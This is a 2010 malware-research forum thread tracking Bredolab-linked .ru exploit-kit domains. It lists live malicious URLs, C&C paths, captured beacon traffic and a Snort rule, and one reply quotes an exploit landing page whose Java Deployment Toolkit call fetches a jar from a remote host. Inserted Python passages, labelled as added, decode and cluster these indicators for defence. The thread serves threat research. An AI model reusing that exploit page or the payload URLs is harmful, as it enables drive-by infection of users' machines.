Author Topic: .ru domains over port 8080  (Read 26253 times)


May 17, 2010, 07:21:35 pm

eoin.miller

Found a few exploit kits that are all ending in .ru and running on port 8080/TCP.

188.165.61.44 - relaxedgrape.ru - 8080/TCP

Entry:
http://relaxedgrape.ru:8080/google.com/download.com/sanspo.com.php

PDF:
http://relaxedgrape.ru:8080/Notes1.pdf
http://wepawet.iseclab.org/view.php?hash=818c879f5b8bf09642cee47394ef28a4&type=js

Java:
http://relaxedgrape.ru:8080/Applet1.html



188.165.192.22 - cornerrat.ru, rarephone.ru - 8080/TCP
Entry:
http://rarephone.ru:8080/index.php?pid=7

PDF:
http://rarephone.ru:8080/Notes7.pdf

Java:
http://rarephone.ru:8080/Applet7.html

Malware/Payload:
http://cornerrat.ru:8080/welcome.php?id=6&pid=1&hello=503


174.137.179.244 - globaljoke.ru, gothguilt.ru - 8080/TCP
Malware/Payload:
http://globaljoke.ru:8080/welcome.php?id=6&pid=1&hello=503

May 17, 2010, 07:33:09 pm
Reply #1

eoin.miller

188.165.192.22 - fewrocker.ru

Java:
http://fewrocker.ru:8080/Applet2.html

May 17, 2010, 07:37:51 pm
Reply #2

philipp

Quote
188.165.192.22 - fewrocker.ru

Code:
200 http://fewrocker.ru:8080/
403 http://fewrocker.ru:8080/i/
403 http://fewrocker.ru:8080/22/
200 http://fewrocker.ru:8080/cache/
403 http://fewrocker.ru:8080/cgi-bin/
403 http://fewrocker.ru:8080/images/
200 http://fewrocker.ru:8080/new/
200 http://fewrocker.ru:8080/22/build.exe (MD5: 39ed2b2e25883aa21ae1dde13adf7d99)
403 http://fewrocker.ru:8080/22/33/
302 http://fewrocker.ru:8080/22/cgi-bin/
302 http://fewrocker.ru:8080/22/33/cgi-bin/
200 http://fewrocker.ru:8080/new/index.php
403 http://fewrocker.ru:8080/new/include/
200 http://fewrocker.ru:8080/new/install/
403 http://fewrocker.ru:8080/new/logs/
200 http://fewrocker.ru:8080/new/install/index.php

May 17, 2010, 07:38:53 pm
Reply #3

eoin.miller

Couple more, I'll keep updating the thread as I find stuff:

greatfile.ru - 85.17.19.26
valuablemind.ru - 94.75.243.6

May 17, 2010, 07:41:55 pm
Reply #4

eoin.miller

Bredolab I take it philipp?

Quote
BM Tx Edition
Src:http://fewrocker.ru:8080/new/

May 17, 2010, 07:49:49 pm
Reply #5

philipp

Quote
Bredolab I take it philipp?

Quote
BM Tx Edition
Src:http://fewrocker.ru:8080/new/

BManager C&C Panel
Don't know if there is a connection to Bredolab though. I'm not up-to-date at all :D

May 17, 2010, 07:58:49 pm
Reply #6

CkreM

As far as I know BM is Bredolab.
Mal-Aware

May 17, 2010, 08:01:56 pm
Reply #7

SysAdMini

Quote
As far as I know BM is Bredolab.

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
Ruining the bad guy's day

May 17, 2010, 08:08:46 pm
Reply #8

CkreM

Quote
As far as I know BM is Bredolab.

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc

Yeah, noticed that too.
Could be a non-connected file, or even a file downloaded by Bredolab.

May 17, 2010, 08:27:38 pm
Reply #9

philipp

I see the binary posting data to
Code:
http://morechord.ru/home.php
Code:
VWlkMDo6MjlERDA0QTZ+fjI5REQwNEE2YGAyOUREMDRBNg0K
which looks base64 encoded.

Code:
# morechord.ru
Domain: morechord.ru
 Reg: bushy@bigmailbox.ru
IP: 217.23.7.112
 RDNS:
 ASN: 49981 (NL)
IP: 217.20.47.85
 RDNS:
 ASN: 15830 (GB)
IP: 217.11.254.41
 RDNS: assigned-217-11-254-041.casablanca.cz
 ASN: 15685 (CZ)
IP: 88.191.47.83
 RDNS: sd-7664.dedibox.fr
 ASN: 12322 (FR)
IP: 217.148.89.77
 RDNS:
 ASN: 16237 (NL)

May 17, 2010, 08:30:07 pm
Reply #10

eoin.miller

Quote
As far as I know BM is Bredolab.

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc

What led me to this nest of badness was a signature that fired for Bredolab from that host. One from the VRT/Sourcefire guys and the other from EmergingThreats.net both fired on a packet from this client system.

Request:
Code:
GET /new/controller.php?action=bot&entity_list=&first=1&rnd=981633&uid=1&guid=2678185660
HTTP/1.1
Host: bayjail.ru

Signature:
Code:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPECIFIC-THREATS Bredolab downloader communication with server attempt"; flow:to_server,established; uricontent:"action="; nocase; uricontent:"entity"; nocase; uricontent:"rnd="; nocase; uricontent:"uid="; nocase; uricontent:"guid="; nocase; pcre:"/uid\x3D\d/Usmi"; pcre:"/guid\x3D\d/Usmi"; pcre:"/rnd\x3D\d/smiU"; metadata:policy balanced-ips drop, policy security-ips drop; reference:url,www.threatexpert.com/report.aspx?md5=b5a530185d35ea8305d3742e2ee5669f; classtype:trojan-activity; sid:16144; rev:2;)
I looked into what else the infected client system was connected to and then looked around for more *.ru domains that people were talking to over 8080/TCP.

EDIT:

I thought bayjail.ru was already on the MDL, I guess it isn't and should be added.

Code:
#nslookup bayjail.ru

Non-authoritative answer:
Name:    bayjail.ru
Addresses:  88.191.47.83
          217.11.254.41
          217.20.47.85
          217.23.7.112
          217.148.89.77
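The signature quoted above is five case-insensitive uricontent substring checks plus three pcre tests (the \x3D in the pcre is the '=' character). As an added example that is not part of this thread, here is a Python re-implementation of just those checks, run over the captured request line and over a constructed benign request that also carries an action= parameter. It deliberately skips the rule's flow, port and URI-normalisation conditions, so it shows what the rule keys on rather than reproducing Snort's matcher.

```python
import re

# Constructed test input: the first line is the GET posted in the thread,
# the second a benign-looking request that must not fire.
SAMPLE_REQUESTS = [
    "GET /new/controller.php?action=bot&entity_list=&first=1&rnd=981633&uid=1&guid=2678185660 HTTP/1.1",
    "GET /index.php?action=view&id=42 HTTP/1.1",
]

# uricontent:"..."; nocase  ->  case-insensitive substring test on the URI
URICONTENT = ["action=", "entity", "rnd=", "uid=", "guid="]

# pcre:"/uid\x3D\d/Usmi" etc.  ->  uid=<digit>, flag i = case-insensitive
PCRE = [re.compile(p, re.IGNORECASE) for p in (r"uid=\d", r"guid=\d", r"rnd=\d")]


def request_uri(request_line):
    """Return the URI from an HTTP request line, or None if the line is not one."""
    parts = request_line.split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    return parts[1]


def matches_sid16144(request_line):
    """True when every uricontent and pcre condition of sid:16144 holds on the URI."""
    uri = request_uri(request_line)
    if uri is None:
        return False
    lowered = uri.lower()
    if not all(token in lowered for token in URICONTENT):
        return False
    return all(rx.search(uri) for rx in PCRE)


def scan(request_lines):
    """Return the request lines that would raise the alert."""
    return [line for line in request_lines if matches_sid16144(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print("ALERT sid:16144 Bredolab downloader communication:", hit)
```

Note that "uid=" is also a substring of "guid=", so the uid= uricontent adds nothing on its own; it is the three pcre digit checks together with entity and rnd= that keep the rule from firing on ordinary action= requests like the second sample.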

May 17, 2010, 08:31:09 pm
Reply #11

SysAdMini

Quote
which looks base64 encoded.

Noticed this too. Decoded string looks like an id.
Code:
Uid0::29DD04A6~~29DD04A6``29DD04A6

May 17, 2010, 08:56:39 pm
Reply #12

eoin.miller

Seen other infected hosts POSTing to foresaleonline.ru

Code:
#nslookup foresaleonline.ru

Non-authoritative answer:
Name:    foresaleonline.ru
Addresses:  217.11.254.41
          217.20.47.85
          217.148.89.77
          62.84.155.246
          88.191.47.83

The POST:

Code:
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"

VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K

------------XXXXXXXXXXXXXXXXXXXXXX--
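The "data" field in that POST is the same base64 id string SysAdMini decoded a few replies up, with a different id. As an added example that is not part of this thread, the Python below pulls the field out of the captured POST (reconstructed here as a constructed byte string, with the blank line between HTTP headers and body that the forum copy collapses), base64-decodes it and splits the "Uid0::A~~B``C" string on its separators, so a triage script can pull the bot id straight out of a pcap-derived request.

```python
import base64
import re

# Constructed sample: the POST to foresaleonline.ru as captured in the thread,
# re-assembled with CRLF line endings and the header/body blank line.
SAMPLE_POST = (
    b"POST /ololo.php HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)\r\n"
    b"Host: foresaleonline.ru\r\n"
    b"Accept: text/html\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Length: 173\r\n"
    b"Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX\r\n"
    b"\r\n"
    b"------------XXXXXXXXXXXXXXXXXXXXXX\r\n"
    b'Content-Disposition: form-data; name="data"\r\n'
    b"\r\n"
    b"VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K\r\n"
    b"------------XXXXXXXXXXXXXXXXXXXXXX--\r\n"
)

# Decoded shape seen in the thread: "Uid0::<id>~~<id>``<id>"
BEACON_RE = re.compile(r"^(?P<tag>[A-Za-z]+\d*)::(?P<fields>.+)$")


def extract_form_field(raw_request, field_name):
    """Return the raw bytes of one multipart/form-data field, or None if absent."""
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    if not sep:
        return None
    m = re.search(rb"boundary=([^\r\n;]+)", head)
    if not m:
        return None
    delimiter = b"--" + m.group(1).strip()
    wanted = rb'name="' + re.escape(field_name.encode()) + rb'"'
    for part in body.split(delimiter):
        part_head, part_sep, part_body = part.partition(b"\r\n\r\n")
        if part_sep and re.search(wanted, part_head):
            return part_body.rstrip(b"\r\n")  # drop the CRLF before the next delimiter
    return None


def decode_beacon(b64_text):
    """base64-decode the field and split the id string on its ::, ~~ and `` separators."""
    text = base64.b64decode(b64_text).decode("ascii").strip()
    m = BEACON_RE.match(text)
    if not m:
        return None
    ids = re.split(r"~~|``", m.group("fields"))
    return {"tag": m.group("tag"), "ids": ids, "consistent": len(set(ids)) == 1}


def analyze_post(raw_request):
    """End to end: pull the 'data' field out of a captured POST and decode it."""
    field = extract_form_field(raw_request, "data")
    return None if field is None else decode_beacon(field)


if __name__ == "__main__":
    print(analyze_post(SAMPLE_POST))
    # philipp's sample from earlier in the thread decodes the same way
    print(decode_beacon("VWlkMDo6MjlERDA0QTZ+fjI5REQwNEE2YGAyOUREMDRBNg0K"))
```

The three fields carry the same 8-hex-digit value in both captures (29DD04A6 in philipp's, 2EDD04A8 here), which is why the "consistent" flag is worth keeping: a beacon whose copies disagree is either a different build or a parsing mistake.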

May 17, 2010, 09:00:43 pm
Reply #13

CkreM

Quote
Seen other infected hosts POSTing to foresaleonline.ru

Code:
#nslookup foresaleonline.ru
Server:  krusty.eid.doi.gov
Address:  10.10.2.3

Non-authoritative answer:
Name:    foresaleonline.ru
Addresses:  217.11.254.41
          217.20.47.85
          217.148.89.77
          62.84.155.246
          88.191.47.83

The POST:

Code:
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"

VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K

------------XXXXXXXXXXXXXXXXXXXXXX--

Looks like an FTP stealer.
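The nslookup output for foresaleonline.ru, bayjail.ru and morechord.ru above all point at largely the same five addresses. As an added example that is not part of this thread, the Python below takes those three address sets (copied from the posts, plus one constructed control domain) and groups domains by shared A records, which is the pivot a defender uses to block the rest of a hosting cluster once one domain is identified.

```python
from collections import defaultdict
from itertools import combinations

# A records as posted in the thread (constructed from the nslookup/whois output),
# plus one made-up control domain that must not join the cluster.
RESOLUTIONS = {
    "morechord.ru": {"217.23.7.112", "217.20.47.85", "217.11.254.41", "88.191.47.83", "217.148.89.77"},
    "bayjail.ru": {"88.191.47.83", "217.11.254.41", "217.20.47.85", "217.23.7.112", "217.148.89.77"},
    "foresaleonline.ru": {"217.11.254.41", "217.20.47.85", "217.148.89.77", "62.84.155.246", "88.191.47.83"},
    "control.invalid": {"192.0.2.10"},  # constructed, reserved documentation address
}


def shared_ips(resolutions):
    """Map each address to the domains resolving to it, keeping only addresses seen for 2+ domains."""
    by_ip = defaultdict(set)
    for domain, ips in resolutions.items():
        for ip in ips:
            by_ip[ip].add(domain)
    return {ip: doms for ip, doms in by_ip.items() if len(doms) > 1}


def overlap(resolutions, a, b):
    """Jaccard overlap of two domains' address sets (1.0 = identical)."""
    sa, sb = resolutions[a], resolutions[b]
    return len(sa & sb) / len(sa | sb)


def cluster(resolutions, threshold=0.5):
    """Group domains whose address sets overlap at least `threshold`, via union-find over pairs."""
    parent = {d: d for d in resolutions}

    def find(d):
        while parent[d] != d:
            parent[d] = parent[parent[d]]  # path halving
            d = parent[d]
        return d

    for a, b in combinations(resolutions, 2):
        if overlap(resolutions, a, b) >= threshold:
            parent[find(a)] = find(b)
    groups = defaultdict(set)
    for d in resolutions:
        groups[find(d)].add(d)
    # largest cluster first, members sorted, so output is stable
    return sorted((sorted(g) for g in groups.values()), key=lambda g: (-len(g), g))


if __name__ == "__main__":
    for ip, doms in sorted(shared_ips(RESOLUTIONS).items()):
        print(ip, "->", ", ".join(sorted(doms)))
    print(cluster(RESOLUTIONS))
```

The threshold matters: morechord.ru and bayjail.ru share all five addresses, foresaleonline.ru shares four of six with each of them (overlap 0.67), so 0.5 joins all three while a single shared address on a busy shared host would not.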

May 17, 2010, 09:04:24 pm
Reply #14

matt

I'm not sure if these domains are on the MDL, but I've seen hits on identical activity out of these domains with the associated dates if this helps the cause:

flowdisappear.ru / 82.211.7.32 (4/29)
passportblues.ru / 62.67.246.113 (5/5 + 5/12)
gigafleet.ru / 62.193.208.175 (5/6)
gothguilt.ru / 93.89.80.117 (5/13)
??? / 85.17.137.40 (5/15) # didn't capture the URL in this request, but fits the profile.
valuablemind.ru / 85.17.19.26 (5/17)

All of the requests are similar:

Code:
<html><head><title>Bob's Homepage</title></head><body><applet width='100%' height='100%' code='iPhoneBook' archive='Games.jar'><param name='site' VALUE='Njg3NDc0NzAzQTJGMkY2NzZGNzQ2ODY3NzU2OTZDNzQyRTcyNzUzQTM4MzAzODMwMkY3NzY1NkM2MzZGNkQ2NTJFNzA2ODcwM0Y2OTY0M0QzMTMxMjY3MDY5NjQzRDMxMjYzMTNEMzEyNjY0'></applet><applet code='sunny.Changes.class' archive='NewGames.jar' width='254' height='186'><param name='data' VALUE='http://gothguilt.ru:8080/welcome.php?id=9&pid=1&1=1'><param name='cc' value='1'></applet><script>
        var u = "http: -J-jar -J\\\\78.26.127.127\\public\\001.jar none";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");
            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
            o.launch(u);
        } else {
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");

            o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);
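The second applet in that page hands its welcome.php URL over in the clear in the data parameter, while the first applet's site parameter is the same kind of URL wrapped twice: base64 of the hex encoding of the ASCII text. That is my own decoding of the value matt posted, not something the thread states; it checks out because the result is another http://gothguilt.ru:8080/welcome.php?... URL in the same form (the copy on the page ends in a dangling "&d", reproduced as is). As an added example that is not part of this thread, the Python below extracts every param from the applet markup (the script block is left out), peels the encoding layers off, and returns the URLs and hostnames a defender would feed into a blocklist.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Constructed sample: the two applet tags from the page matt posted, without the script.
SAMPLE_APPLET_HTML = (
    "<applet width='100%' height='100%' code='iPhoneBook' archive='Games.jar'>"
    "<param name='site' VALUE='Njg3NDc0NzAzQTJGMkY2NzZGNzQ2ODY3NzU2OTZDNzQyRTcyNzUzQTM4MzAzODMwMkY3NzY1NkM2MzZGNkQ2NTJFNzA2ODcwM0Y2OTY0M0QzMTMxMjY3MDY5NjQzRDMxMjYzMTNEMzEyNjY0'>"
    "</applet>"
    "<applet code='sunny.Changes.class' archive='NewGames.jar' width='254' height='186'>"
    "<param name='data' VALUE='http://gothguilt.ru:8080/welcome.php?id=9&pid=1&1=1'>"
    "<param name='cc' value='1'></applet>"
)

PARAM_RE = re.compile(
    r"<param\s+name=['\"]([^'\"]+)['\"]\s+value=['\"]([^'\"]*)['\"]", re.IGNORECASE)


def applet_params(html):
    """Return {name: value} for every <param> tag in the fragment."""
    return dict(PARAM_RE.findall(html))


def unwrap(value, max_layers=4):
    """Peel hex and base64 layers off a value until it reads as a URL.

    Hex is tried before base64 because a hex string is itself valid base64
    and would otherwise decode to garbage; the loop is bounded so odd input
    cannot spin.
    """
    text = value
    for _ in range(max_layers):
        if text.startswith("http"):
            break
        decoded = None
        for decoder in (binascii.unhexlify, lambda s: base64.b64decode(s, validate=True)):
            try:
                candidate = decoder(text).decode("ascii")
            except (binascii.Error, ValueError, UnicodeDecodeError):
                continue
            if candidate.isprintable():
                decoded = candidate
                break
        if decoded is None:
            break
        text = decoded
    return text


def extract_payload_urls(html):
    """Return {param_name: URL} for every applet parameter that unwraps to a URL."""
    found = {}
    for name, value in applet_params(html).items():
        decoded = unwrap(value)
        if decoded.startswith("http"):
            found[name] = decoded
    return found


def payload_hosts(html):
    """Hostnames from the decoded parameter URLs, the part worth blocking."""
    return sorted({urlsplit(u).hostname for u in extract_payload_urls(html).values()})


if __name__ == "__main__":
    for name, url in extract_payload_urls(SAMPLE_APPLET_HTML).items():
        print(f"{name}: {url}")
    print("hosts:", payload_hosts(SAMPLE_APPLET_HTML))
```

Running it on the sample yields id=11 for the encoded site parameter against id=9 for the plain data parameter, the same welcome.php endpoint and host in both, so a single block on gothguilt.ru:8080 covers what both applets would fetch.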